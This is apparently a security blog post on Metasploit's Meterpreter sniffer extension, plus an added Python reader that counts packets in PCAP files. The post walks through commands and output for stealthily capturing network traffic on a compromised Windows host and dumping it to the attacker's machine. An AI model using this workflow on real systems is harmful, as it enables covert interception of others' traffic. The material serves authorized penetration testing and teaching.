HD released today an early beta of a sniffer module. This module uses the MicroOLAP Packet Sniffer SDK, which is a commercial product, and it can sniff packets from the target system without writing to the file system or installing any drivers. This adds to the stealthiness of the Meterpreter modules. The module automatically excludes its own control traffic from the packet capture. I have tested this module on the following Windows versions and privileges:
- Windows XP SP3 32 bit – Administrator
- Windows 2003 SP2 32 bit – Administrator
- Windows 2008 SP2 32 bit – Administrator
- Vista SP2 32 bit with UAC – Administrator
- Vista SP2 32 bit no UAC – Administrator
- Windows 7 32 bit with UAC – Administrator
- Windows 7 32 bit no UAC – Administrator
- Vista SP2 32 bit with UAC – System
- Windows 7 32 bit with UAC – System
It worked on most of the configurations without any problems, except for Windows Vista and Windows 7 with UAC enabled and running as Local Administrator; when run as System, the UAC protection was not able to mitigate the attack.
To start using this module one must only load the module while in a Meterpreter shell on a compromised target. This is achieved in the following manner:

    meterpreter > use sniffer
    Loading extension sniffer...success.
    meterpreter >

Once the module is loaded, one can see the commands added to the console by running the help command:

    meterpreter > help
    .......
    Sniffer Commands
    ================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data
    sniffer_interfaces  List all remote sniffable interfaces
    sniffer_start       Capture packets on a previously opened interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet captures on the specified interface

As can be seen, the commands allow one to:
- List the interfaces in the target host
- Start the packet capture
- Get a status of the number of packet captured and the size of the captured data
- Stop the capture
- Dump the captured data to a pcap file
Let's start by finding out two key pieces of information, if not already known: what OS the target is running and what account I'm running under:

    meterpreter > sysinfo
    Computer: AWINXP01
    OS : Windows XP (Build 2600, Service Pack 2).
    meterpreter > getuid
    Server username: ACMEPRODINCAdministrator
    meterpreter >

As we can see, the target machine is a Windows XP SP2 box and we are running under Domain Admin privileges in this box. We list the interfaces available on this box:

    meterpreter > sniffer_interfaces
    1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
    meterpreter >

This command will give us lots of information, like the MTU for the packets, whether the interface is usable for sniffing, whether it is using DHCP to get its address, and whether it is a wireless interface. Now that we have the interfaces identified, we can start sniffing on one of them:

    meterpreter > sniffer_start 1 300000
    [*] Capture started on interface 1 (300000 packet buffer)
    meterpreter >

When starting the capture, one must provide the interface number and the packet buffer to capture; if none is given, a packet buffer of 200,000 packets will be used. We can check on the size of the packet capture and the number of packets by running the sniffer_stats command followed by the number of the interface:

    meterpreter > sniffer_stats 1
    [*] Capture statistics for interface 1
    bytes: 17675
    packets: 196
    meterpreter >

To clear the cache and save the capture to a file, we run the sniffer_dump command followed by the file where we want to save the data:

    meterpreter > sniffer_dump 1 /tmp/capture.cap
    [*] Dumping packets from interface 1...
    [*] Wrote 536 packets to PCAP file /tmp/capture.cap
    meterpreter >

Packets are saved in PCAP format and the buffer on the target machine is cleared. We can dump the next buffer and append it to the existing PCAP file if we want:

    meterpreter > sniffer_dump 1 /tmp/capture.cap
    [*] Dumping packets from interface 1...
    [*] Wrote 536 packets to PCAP file /tmp/capture.cap
    meterpreter > sniffer_dump 1 /tmp/capture.cap
    [*] Dumping packets from interface 1...
    [*] Wrote 216 packets to PCAP file /tmp/capture.cap
    meterpreter >

To stop the packet capture, we issue the sniffer_stop command followed by the interface number:

    meterpreter > sniffer_stop 1
    [*] Capture stopped on interface 1
    meterpreter >

We can later examine our captured packets with any tool that can read PCAP files, like Wireshark or Network Miner. I hope you find this module as useful as I know the Security Weekly crew will in our pentests.
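
As an added example (not part of the original post or of Metasploit), the following Python reader walks a saved capture file and counts its packets and captured bytes, so the total can be compared with the "Wrote N packets" lines after several dumps were appended to the same file. It assumes the classic libpcap layout (24-byte global header, 16-byte record headers, not pcapng); `pcap_stats` and `build_sample` are hypothetical names and the sample capture is constructed.

```python
import io
import struct

# Magic numbers of the classic libpcap format, mapped to struct byte order.
MAGICS = {
    b"\xd4\xc3\xb2\xa1": "<",  # little-endian, microsecond timestamps
    b"\xa1\xb2\xc3\xd4": ">",  # big-endian, microsecond timestamps
    b"\x4d\x3c\xb2\xa1": "<",  # little-endian, nanosecond timestamps
    b"\xa1\xb2\x3c\x4d": ">",  # big-endian, nanosecond timestamps
}

def pcap_stats(stream):
    """Return packet count, captured bytes and a truncation flag for a PCAP stream."""
    header = stream.read(24)
    if len(header) < 24 or header[:4] not in MAGICS:
        raise ValueError("not a classic libpcap file")
    order = MAGICS[header[:4]]
    major, minor, _zone, _sigfigs, snaplen, linktype = struct.unpack(
        order + "HHiIII", header[4:])
    stats = {"version": (major, minor), "snaplen": snaplen, "linktype": linktype,
             "packets": 0, "bytes": 0, "truncated": False}
    while True:
        rec = stream.read(16)
        if not rec:
            break  # clean end of file
        if len(rec) < 16:
            stats["truncated"] = True  # partial record header at end of file
            break
        _sec, _frac, incl_len, _orig_len = struct.unpack(order + "IIII", rec)
        data = stream.read(incl_len)
        if len(data) < incl_len:
            stats["truncated"] = True  # packet body cut short
            break
        stats["packets"] += 1
        stats["bytes"] += incl_len
    return stats

def build_sample(lengths):
    """Constructed sample: little-endian PCAP holding zero-filled Ethernet frames."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 1514, 1)
    for i, n in enumerate(lengths):
        out += struct.pack("<IIII", 1_000_000 + i, 0, n, n) + bytes(n)
    return out

if __name__ == "__main__":
    print(pcap_stats(io.BytesIO(build_sample([60, 1514, 342]))))
```

A `truncated` result of `True` means the file ends in the middle of a record, which is worth checking before loading an appended capture into an analysis tool.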